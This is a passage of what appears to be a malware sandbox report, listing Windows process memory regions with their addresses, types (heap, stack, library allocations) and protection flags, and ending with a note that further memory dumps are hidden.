page read and write
|
||
|
7FFB4AE00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BCC3000
|
heap
|
page read and write
|
||
|
2C6E000
|
stack
|
page read and write
|
||
|
61E693E000
|
stack
|
page read and write
|
||
|
24BFB5D0000
|
heap
|
page read and write
|
||
|
24144B00000
|
trusted library allocation
|
page read and write
|
||
|
4F2C000
|
stack
|
page read and write
|
||
|
24BFD200000
|
heap
|
page read and write
|
||
|
1AB79B63000
|
heap
|
page read and write
|
||
|
D44000
|
trusted library allocation
|
page read and write
|
||
|
24B8010B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
10C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFD0000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
1FFE4630000
|
heap
|
page read and write
|
||
|
1AB7B937000
|
heap
|
page read and write
|
||
|
1FFE46E4000
|
heap
|
page read and write
|
||
|
1AB7BCFD000
|
heap
|
page read and write
|
||
|
61E673E000
|
stack
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
7BB0A7E000
|
stack
|
page read and write
|
||
|
7BB0E7E000
|
stack
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
10E0000
|
heap
|
page read and write
|
||
|
2F58000
|
trusted library allocation
|
page read and write
|
||
|
241346C0000
|
heap
|
page read and write
|
||
|
2B13000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
|
690D000
|
stack
|
page read and write
|
||
|
1FFE4914000
|
heap
|
page read and write
|
||
|
FCDBFF000
|
stack
|
page read and write
|
||
|
1AB7B99A000
|
heap
|
page read and write
|
||
|
1FFE7B3A000
|
trusted library allocation
|
page read and write
|
||
|
5AFB000
|
trusted library allocation
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
7FFB4A160000
|
trusted library allocation
|
page read and write
|
||
|
5E30000
|
trusted library allocation
|
page read and write
|
||
|
5B11000
|
trusted library allocation
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
1050000
|
trusted library allocation
|
page read and write
|
||
|
1AB79A80000
|
heap
|
page read and write
|
||
|
FE5000
|
heap
|
page read and write
|
||
|
1FFFE65E000
|
heap
|
page read and write
|
||
|
1094000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B950000
|
heap
|
page read and write
|
||
|
2414CCA0000
|
heap
|
page read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page read and write
|
||
|
1FFFE5FE000
|
heap
|
page read and write
|
||
|
1AB7B967000
|
heap
|
page read and write
|
||
|
1FFFE832000
|
heap
|
page read and write
|
||
|
24BFB880000
|
heap
|
page read and write
|
||
|
24134C04000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A040000
|
trusted library allocation
|
page read and write
|
||
|
1AB79B55000
|
heap
|
page read and write
|
||
|
7FFB4ACE4000
|
trusted library allocation
|
page read and write
|
||
|
24B90010000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A090000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7B922000
|
heap
|
page read and write
|
||
|
61E60C3000
|
stack
|
page read and write
|
||
|
1148000
|
heap
|
page read and write
|
||
|
D8E000
|
heap
|
page read and write
|
||
|
7BB0B7E000
|
stack
|
page read and write
|
||
|
1AB7BA90000
|
heap
|
page read and write
|
||
|
5B30000
|
heap
|
page read and write
|
||
|
5753F4E000
|
stack
|
page read and write
|
||
|
1280000
|
heap
|
page read and write
|
||
|
1AB7B99A000
|
heap
|
page read and write
|
||
|
1080000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EC0000
|
trusted library allocation
|
page read and write
|
||
|
10CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
24B80111000
|
trusted library allocation
|
page read and write
|
||
|
1FFE4900000
|
trusted library allocation
|
page read and write
|
||
|
24132C38000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
24BFB490000
|
heap
|
page read and write
|
||
|
5C30000
|
trusted library allocation
|
page read and write
|
||
|
13D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE9A000
|
trusted library allocation
|
page read and write
|
||
|
10BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BFD5F3000
|
heap
|
page read and write
|
||
|
FCD7FE000
|
stack
|
page read and write
|
||
|
24132C30000
|
heap
|
page read and write
|
||
|
1390000
|
trusted library allocation
|
page read and write
|
||
|
820000
|
unkown
|
page readonly
|
||
|
1AB7B972000
|
heap
|
page read and write
|
||
|
2DA0000
|
trusted library allocation
|
page read and write
|
||
|
5CA1000
|
trusted library allocation
|
page read and write
|
||
|
1FFE5F60000
|
trusted library allocation
|
page read and write
|
||
|
FEF000
|
stack
|
page read and write
|
||
|
1AB7BA2C000
|
heap
|
page read and write
|
||
|
24B80069000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEE0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B920000
|
heap
|
page read and write
|
||
|
1FFFE85F000
|
heap
|
page read and write
|
||
|
1AB7B950000
|
heap
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page read and write
|
||
|
241345E0000
|
trusted library allocation
|
page read and write
|
||
|
24134B4D000
|
trusted library allocation
|
page read and write
|
||
|
1FFE684A000
|
trusted library allocation
|
page read and write
|
||
|
61E683E000
|
stack
|
page read and write
|
||
|
1AB7B925000
|
heap
|
page read and write
|
||
|
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA68000
|
heap
|
page read and write
|
||
|
6E8D000
|
stack
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
1FFE6822000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA78000
|
heap
|
page read and write
|
||
|
61E657E000
|
stack
|
page read and write
|
||
|
59EA000
|
stack
|
page read and write
|
||
|
1093000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
1040000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BD21000
|
heap
|
page read and write
|
||
|
1FFE7D96000
|
trusted library allocation
|
page read and write
|
||
|
51E0000
|
heap
|
page execute and read and write
|
||
|
1AB7BCC1000
|
heap
|
page read and write
|
||
|
1446000
|
heap
|
page read and write
|
||
|
57530FE000
|
stack
|
page read and write
|
||
|
1FFFE879000
|
heap
|
page read and write
|
||
|
2EEF000
|
stack
|
page read and write
|
||
|
1AB79AC2000
|
heap
|
page read and write
|
||
|
1AB7B950000
|
heap
|
page read and write
|
||
|
1FFE7B3E000
|
trusted library allocation
|
page read and write
|
||
|
57532F8000
|
stack
|
page read and write
|
||
|
10C7000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B10000
|
heap
|
page read and write
|
||
|
7FFB4A140000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD96000
|
trusted library allocation
|
page read and write
|
||
|
1FFE4660000
|
heap
|
page read and write
|
||
|
24BFB650000
|
trusted library allocation
|
page read and write
|
||
|
D43000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7B98F000
|
heap
|
page read and write
|
||
|
5C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7B99A000
|
heap
|
page read and write
|
||
|
1AB7BCBB000
|
heap
|
page read and write
|
||
|
24134C09000
|
trusted library allocation
|
page read and write
|
||
|
1FFE7DB6000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
|
FEE40000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AF0000
|
trusted library allocation
|
page read and write
|
||
|
24134B13000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE82000
|
trusted library allocation
|
page read and write
|
||
|
5B16000
|
trusted library allocation
|
page read and write
|
||
|
2414CC8E000
|
heap
|
page read and write
|
||
|
1FFE7B2D000
|
trusted library allocation
|
page read and write
|
||
|
6C4C000
|
stack
|
page read and write
|
||
|
24134B3A000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B992000
|
heap
|
page read and write
|
||
|
1FFE467E000
|
heap
|
page read and write
|
||
|
1AB7B924000
|
heap
|
page read and write
|
||
|
1AB7B950000
|
heap
|
page read and write
|
||
|
24134BED000
|
trusted library allocation
|
page read and write
|
||
|
5C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
104A000
|
trusted library allocation
|
page execute and read and write
|
||
|
5752E7F000
|
stack
|
page read and write
|
||
|
7FFB4ADC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFFE65B000
|
heap
|
page read and write
|
||
|
24144AF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A060000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AF10000
|
trusted library allocation
|
page read and write
|
||
|
24134BE5000
|
trusted library allocation
|
page read and write
|
||
|
E5B000
|
stack
|
page read and write
|
||
|
61E6B3B000
|
stack
|
page read and write
|
||
|
132E000
|
stack
|
page read and write
|
||
|
24132BA0000
|
heap
|
page read and write
|
||
|
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
13A0000
|
trusted library allocation
|
page read and write
|
||
|
2414CDA0000
|
heap
|
page read and write
|
||
|
1FFE5F40000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF492620000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4ACE2000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B957000
|
heap
|
page read and write
|
||
|
DE3000
|
heap
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
12DF000
|
stack
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B4E0000
|
heap
|
page read and write
|
||
|
7FFB4A1F0000
|
trusted library allocation
|
page read and write
|
||
|
1FFE46A1000
|
heap
|
page read and write
|
||
|
6ECC000
|
stack
|
page read and write
|
||
|
24B8054E000
|
trusted library allocation
|
page read and write
|
||
|
1FFF6430000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1C0000
|
trusted library allocation
|
page read and write
|
||
|
24132C78000
|
heap
|
page read and write
|
||
|
1FFE4910000
|
heap
|
page read and write
|
||
|
1FFE7EE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
3D31000
|
trusted library allocation
|
page read and write
|
||
|
13C2000
|
trusted library allocation
|
page read and write
|
||
|
24BFB6F7000
|
heap
|
page read and write
|
||
|
1136000
|
heap
|
page read and write
|
||
|
1FFE6421000
|
trusted library allocation
|
page read and write
|
||
|
FCD6FE000
|
stack
|
page read and write
|
||
|
55CE000
|
stack
|
page read and write
|
||
|
5380000
|
heap
|
page execute and read and write
|
||
|
59AE000
|
stack
|
page read and write
|
||
|
1FFE475E000
|
heap
|
page read and write
|
||
|
24B8001B000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B935000
|
heap
|
page read and write
|
||
|
5AFE000
|
trusted library allocation
|
page read and write
|
||
|
5390000
|
trusted library allocation
|
page execute and read and write
|
||
|
1090000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFFE5B7000
|
heap
|
page execute and read and write
|
||
|
7FFB4B08B000
|
trusted library allocation
|
page read and write
|
||
|
2B06000
|
trusted library allocation
|
page read and write
|
||
|
24B80500000
|
trusted library allocation
|
page read and write
|
||
|
241345D0000
|
heap
|
page readonly
|
||
|
1AB7BB14000
|
heap
|
page read and write
|
||
|
1103000
|
heap
|
page read and write
|
||
|
24132B80000
|
heap
|
page read and write
|
||
|
7FFB4AD9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB79A50000
|
heap
|
page read and write
|
||
|
7FFB4A130000
|
trusted library allocation
|
page read and write
|
||
|
5E60000
|
heap
|
page read and write
|
||
|
24B80158000
|
trusted library allocation
|
page read and write
|
||
|
502E000
|
stack
|
page read and write
|
||
|
5C90000
|
heap
|
page read and write
|
||
|
24BFD740000
|
heap
|
page read and write
|
||
|
24134BE7000
|
trusted library allocation
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
1AB7B977000
|
heap
|
page read and write
|
||
|
1AB7BCBD000
|
heap
|
page read and write
|
||
|
13D7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A0D0000
|
trusted library allocation
|
page read and write
|
||
|
10FE000
|
heap
|
page read and write
|
||
|
1FFFEBE0000
|
heap
|
page read and write
|
||
|
2F2C000
|
trusted library allocation
|
page read and write
|
||
|
54C0000
|
heap
|
page read and write
|
||
|
13BB000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
1380000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BFD610000
|
heap
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
1FFE45D0000
|
heap
|
page read and write
|
||
|
7FFB4AFD0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA4D000
|
heap
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFE0000
|
trusted library allocation
|
page read and write
|
||
|
241345A0000
|
trusted library allocation
|
page read and write
|
||
|
24BFD550000
|
heap
|
page read and write
|
||
|
13A4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BCFB000
|
heap
|
page read and write
|
||
|
1FFE813A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EB0000
|
trusted library allocation
|
page read and write
|
||
|
822000
|
unkown
|
page readonly
|
||
|
1AB7B927000
|
heap
|
page read and write
|
||
|
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0E0000
|
trusted library allocation
|
page read and write
|
||
|
138F000
|
stack
|
page read and write
|
||
|
1AB7BA31000
|
heap
|
page read and write
|
||
|
61E68BC000
|
stack
|
page read and write
|
||
|
694E000
|
stack
|
page read and write
|
||
|
1AB7BCBE000
|
heap
|
page read and write
|
||
|
1FFE693C000
|
trusted library allocation
|
page read and write
|
||
|
FCD2F6000
|
stack
|
page read and write
|
||
|
F57000
|
stack
|
page read and write
|
||
|
7FFB4ACE4000
|
trusted library allocation
|
page read and write
|
||
|
1FFE46BD000
|
heap
|
page read and write
|
||
|
1AB7BA6D000
|
heap
|
page read and write
|
||
|
24BFD61B000
|
heap
|
page read and write
|
||
|
1AB7B92A000
|
heap
|
page read and write
|
||
|
299E000
|
stack
|
page read and write
|
||
|
24134F90000
|
trusted library allocation
|
page read and write
|
||
|
24BFB6CF000
|
heap
|
page read and write
|
||
|
7FFB49F5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFE8074000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BCC0000
|
heap
|
page read and write
|
||
|
7FFB4AEC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A180000
|
trusted library allocation
|
page read and write
|
||
|
DA9000
|
heap
|
page read and write
|
||
|
24BFD597000
|
heap
|
page read and write
|
||
|
1AB79B4D000
|
heap
|
page read and write
|
||
|
1AB7B92A000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
5752F7E000
|
stack
|
page read and write
|
||
|
5753FCE000
|
stack
|
page read and write
|
||
|
1AB7BA8D000
|
heap
|
page read and write
|
||
|
24134C42000
|
trusted library allocation
|
page read and write
|
||
|
24B80001000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA3D000
|
heap
|
page read and write
|
||
|
7FFB4A051000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA5D000
|
heap
|
page read and write
|
||
|
1FFE4669000
|
heap
|
page read and write
|
||
|
1AB7B99A000
|
heap
|
page read and write
|
||
|
7FFB4AEC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
24134BF1000
|
trusted library allocation
|
page read and write
|
||
|
D53000
|
trusted library allocation
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
EBE000
|
stack
|
page read and write
|
||
|
D9A000
|
heap
|
page read and write
|
||
|
13CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
13AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BA48000
|
heap
|
page read and write
|
||
|
61E614E000
|
stack
|
page read and write
|
||
|
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BC06000
|
heap
|
page read and write
|
||
|
2CB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ADA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
7FFB4ACFB000
|
trusted library allocation
|
page read and write
|
||
|
1FFE7D6B000
|
trusted library allocation
|
page read and write
|
||
|
1AB79A8F000
|
heap
|
page read and write
|
||
|
7FFB49EA4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
|
24134FB7000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
11BE000
|
stack
|
page read and write
|
||
|
24B8088C000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B99A000
|
heap
|
page read and write
|
||
|
1AB7B999000
|
heap
|
page read and write
|
||
|
4E4E000
|
stack
|
page read and write
|
||
|
1FFE64A1000
|
trusted library allocation
|
page read and write
|
||
|
1FFFE650000
|
heap
|
page read and write
|
||
|
5CD0000
|
heap
|
page read and write
|
||
|
7FFB4B061000
|
trusted library allocation
|
page read and write
|
||
|
1FFE681E000
|
trusted library allocation
|
page read and write
|
||
|
2B0B000
|
trusted library allocation
|
page read and write
|
||
|
24134AE0000
|
heap
|
page execute and read and write
|
||
|
1AB7B922000
|
heap
|
page read and write
|
||
|
1FFE6813000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A120000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BB12000
|
heap
|
page read and write
|
||
|
5B0E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFE4748000
|
heap
|
page read and write
|
||
|
2414CE80000
|
heap
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
241345C0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B972000
|
heap
|
page read and write
|
||
|
2414CC2E000
|
heap
|
page read and write
|
||
|
24BFB670000
|
heap
|
page read and write
|
||
|
1FFE46A7000
|
heap
|
page read and write
|
||
|
1FFFE7FC000
|
heap
|
page read and write
|
||
|
FCD9FE000
|
stack
|
page read and write
|
||
|
C9E000
|
stack
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
1FFE7361000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0C0000
|
trusted library allocation
|
page read and write
|
||
|
D4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BB0583000
|
stack
|
page read and write
|
||
|
24BFB590000
|
heap
|
page read and write
|
||
|
7FFB4AEE0000
|
trusted library allocation
|
page read and write
|
||
|
154E000
|
stack
|
page read and write
|
||
|
61E6ABE000
|
stack
|
page read and write
|
||
|
1AB7BD01000
|
heap
|
page read and write
|
||
|
1FFF6451000
|
trusted library allocation
|
page read and write
|
||
|
10A3000
|
trusted library allocation
|
page read and write
|
||
|
24132C44000
|
heap
|
page read and write
|
||
|
2414CE97000
|
heap
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
1AB7BB13000
|
heap
|
page read and write
|
||
|
7FFB4AD96000
|
trusted library allocation
|
page read and write
|
||
|
58AD000
|
stack
|
page read and write
|
||
|
FCDCFB000
|
stack
|
page read and write
|
||
|
13B8000
|
trusted library allocation
|
page read and write
|
||
|
105E000
|
stack
|
page read and write
|
||
|
24132C72000
|
heap
|
page read and write
|
||
|
1FFE44F0000
|
heap
|
page read and write
|
||
|
1FFE6815000
|
trusted library allocation
|
page read and write
|
||
|
2414CC93000
|
heap
|
page read and write
|
||
|
10B0000
|
trusted library allocation
|
page read and write
|
||
|
10FE000
|
stack
|
page read and write
|
||
|
6749000
|
stack
|
page read and write
|
||
|
137E000
|
stack
|
page read and write
|
||
|
1AB7BDD9000
|
heap
|
page read and write
|
||
|
1AB7BC21000
|
heap
|
page read and write
|
||
|
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
|
5752EFE000
|
stack
|
page read and write
|
||
|
7DF4C10E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFE5FC0000
|
trusted library allocation
|
page read and write
|
||
|
1FFE7B1A000
|
trusted library allocation
|
page read and write
|
||
|
1070000
|
trusted library allocation
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
24134BE2000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DBC000
|
stack
|
page read and write
|
||
|
575404D000
|
stack
|
page read and write
|
||
|
10E8000
|
heap
|
page read and write
|
||
|
13DB000
|
trusted library allocation
|
page execute and read and write
|
||
|
586E000
|
stack
|
page read and write
|
||
|
241346C6000
|
heap
|
page read and write
|
||
|
24132C6E000
|
heap
|
page read and write
|
||
|
7FFB4A070000
|
trusted library allocation
|
page execute and read and write
|
||
|
10A9000
|
trusted library allocation
|
page read and write
|
||
|
5753277000
|
stack
|
page read and write
|
||
|
7FFB4AF00000
|
trusted library allocation
|
page read and write
|
||
|
3F59000
|
trusted library allocation
|
page read and write
|
||
|
1FFF6421000
|
trusted library allocation
|
page read and write
|
||
|
1FFF743B000
|
trusted library allocation
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
7BB09FD000
|
stack
|
page read and write
|
||
|
7FFB49F50000
|
trusted library allocation
|
page read and write
|
||
|
24BFB6BB000
|
heap
|
page read and write
|
||
|
24BFB6B1000
|
heap
|
page read and write
|
||
|
24BFB6AE000
|
heap
|
page read and write
|
||
|
24132C20000
|
heap
|
page read and write
|
||
|
1FFE813E000
|
trusted library allocation
|
page read and write
|
||
|
9E8000
|
stack
|
page read and write
|
||
|
1AB7BB12000
|
heap
|
page read and write
|
||
|
1FFE5F50000
|
heap
|
page readonly
|
||
|
1FFE46E8000
|
heap
|
page read and write
|
||
|
1FFE7B14000
|
trusted library allocation
|
page read and write
|
||
|
61E64FD000
|
stack
|
page read and write
|
||
|
7FFB4A100000
|
trusted library allocation
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
D50000
|
trusted library allocation
|
page read and write
|
||
|
1FFE6826000
|
trusted library allocation
|
page read and write
|
||
|
24134B74000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B063000
|
trusted library allocation
|
page read and write
|
||
|
13A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BB12000
|
heap
|
page read and write
|
||
|
1AB7B98B000
|
heap
|
page read and write
|
There are 718 hidden memdumps, click here to show them.